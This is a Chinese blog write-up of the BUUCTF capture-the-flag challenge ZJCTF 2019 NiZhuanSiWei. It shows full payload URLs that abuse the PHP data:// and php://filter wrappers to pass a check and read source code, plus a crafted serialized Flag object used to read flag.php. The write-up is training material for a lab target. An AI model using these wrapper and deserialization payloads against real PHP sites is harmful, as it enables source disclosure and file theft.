BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-01-29 21:34:49 发布
最新推荐文章于 2024-01-29 21:34:49 发布
阅读量77 收藏 2
点赞数
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134245860
版权

参考:【精选】[php知识点]PHP伪协议-CSDN博客BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)-CSDN博客

进入后发现还是代码审计

发现有三个点需要注意:

 1.需要给text传输一句话

2.useless.php 中有包含漏洞

3.这道题是有序列化和反序列化的

参考他人wp后,发现

进行正则匹配,禁止出现flag

 先向text传输一句话

/index.php/?text=data://text/plain,welcome to the zjctf
base64码也是可以的
/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

接下来,尝试伪协议查看useless.php 内容

/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

出现base64码,解码后,得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码

将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出

最后达到回显flag 的目的

我们先进行代码的修改

<?php  

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a=new Flag();
echo serialize($a);
?>

 直接输出

 获取结果后,将其传给password

/index.php/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源码即可获得flag

注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容

yanglin_371
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BUUCTF]NiZhuanSiWei (writeup)
weixin_63306244的博客
06-17 306
2、看到了后面双斜杠提示的useless.php,说明flag在useless.php里面。3、看到了useless.php下面的unserialize猜测有反序列化。//用data://传入welcome to the zjctf。//用php://查看useless.php源码。然后现在看到代码里的public更加的确定了想法。就得到了useless.php的源码。有了这个后payload就简单了。进入后看到一串php代码。因为上面有分析到反序列化。随后就是传payload。之后就是构造序列化代码。
CTF系列】攻防世界-nizhuansiwei
读万卷书,行万里路。
03-02 521
文章目录1 file_get_content2 include3 反序列化 相关信息: hint:无 进入网站后,便能显示源码,是一道代码审计题目。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; // text 需要等于 welcome if(isset($text)&&(file_get_contents($text,'r')==="welcome to
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 337
这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。
ctfshow-web入门-爆破(web21-24
HkD01L的博客
06-19 408
ctfshow,爆破,web21,web22,web23,web24,writeup,ctf
CTF论剑场web题目(持续更新)--WEB24
jiuyongpinyin的博客
07-25 384
web24 打开页面,是个购物网站,点了点搜索,发现没啥用,查看源码: 在源码的最下面,发现了这个,登陆尝试,发现是一个代码审计,好吧,又是我不会的题: 我只知道这里是让我们对var这个变量先序列化,再进行base64的编码,参考了大佬的write up 参考链接:https://blog.csdn.net/weixin_45940434/article/details/104050262 再次感谢大佬!!! 构造代码: <?php class Small_white_rabbit{ p
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
CTF-Web24(涉及PHP代码审计,较简单)
→_→
09-26 540
24.FALSE 分析: PHP函数 isset():检测变量是否设置 只能用于变量,传递任何其它参数都将造成解析错误。若想检测常量是否已设置,可使用 defined() 函数 格式: isset ( mixed var [, mixed var [, ...]] )     若变量不存在则返回 FALSE    若变量存在且其值为NULL,也返回 FALSE    若变量存在且值不为NULL,则返回 TURE     同时检查多个变量时,每个单项都符合上一条要求...
BugkuCTF-web24(解题思路及步骤)
分享与记录
04-14 2452
看题 到处找,都没有额外信息 抓包 发现“链接”那个地方隐藏了一个a标签,点击跳转,得到代码 分析代码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1)
NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)
weixin_66112047的博客
01-29 411
构造序列化去覆盖,获取flag
CTF-Web24(爆破)
weixin_47059164的博客
08-28 120
知识点:mt_srand(seed) seed是种子数,seed相同的话,随机出来的序列值是相同的mt_rand():产生序列。
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1092
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)
m0_55854679的博客
08-23 1902
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
[ZJCTF 2019]NiZhuanSiWei
satasun的博客
05-25 529
这道题涉及到的知识点: 1.data伪协议写入文件 2.php:// php://filter用于读取源码 php://input用于执行php代码 一进门就给了源码,看来是个代码审计题。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome t
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3879
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1189
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
buuctf web 极客大挑战2019
08-24
对于BUUCTF Web极客大挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值